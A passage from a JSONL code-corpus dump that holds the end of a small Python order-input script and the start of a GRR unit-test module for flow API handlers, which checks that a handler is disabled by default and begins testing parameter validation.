input_lines:\r\n if len(line.split()) != 7:\r\n print('Not all arguments were uploaded')\r\n else:\r\n self.add(line, file, 'file')\r\n print('Well done!')\r\n return self\r\n","sub_path":"programming_task_5/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"473945185","text":"#!/usr/bin/env python\n\"\"\"This module contains tests for flows-related API handlers.\"\"\"\n\n\n\n\nfrom grr.gui import api_test_lib\nfrom grr.gui.api_plugins import flow as flow_plugin\n\nfrom grr.lib import aff4\nfrom grr.lib import flags\nfrom grr.lib import flow\nfrom grr.lib import flow_runner\nfrom grr.lib import output_plugin\nfrom grr.lib import rdfvalue\nfrom grr.lib import test_lib\nfrom grr.lib import throttle\nfrom grr.lib import type_info\nfrom grr.lib import utils\nfrom grr.lib.aff4_objects import collections as aff4_collections\nfrom grr.lib.flows.general import administrative\nfrom grr.lib.flows.general import discovery\nfrom grr.lib.flows.general import file_finder\nfrom grr.lib.flows.general import processes\nfrom grr.lib.flows.general import transfer\nfrom grr.lib.hunts import standard_test\nfrom grr.lib.output_plugins import email_plugin\nfrom grr.lib.rdfvalues import client as rdf_client\nfrom grr.lib.rdfvalues import paths as rdf_paths\n\n\nclass ApiGetFlowStatusHandlerTest(test_lib.GRRBaseTest):\n \"\"\"Test for ApiGetFlowStatusHandler.\"\"\"\n\n def setUp(self):\n super(ApiGetFlowStatusHandlerTest, self).setUp()\n self.client_id = self.SetupClients(1)[0]\n self.handler = flow_plugin.ApiGetFlowStatusHandler()\n\n def testIsDisabledByDefault(self):\n self.assertFalse(self.handler.enabled_by_default)\n\n def testParameterValidation(self):\n \"\"\"Check bad parameters are rejected.\n\n Make sure our input is validated because this API doesn't require\n authorization.\n \"\"\"\n bad_flowid = flow_plugin.ApiGetFlowStatusArgs(\n client_id=self.client_id.Basename(), flow_id=\"X: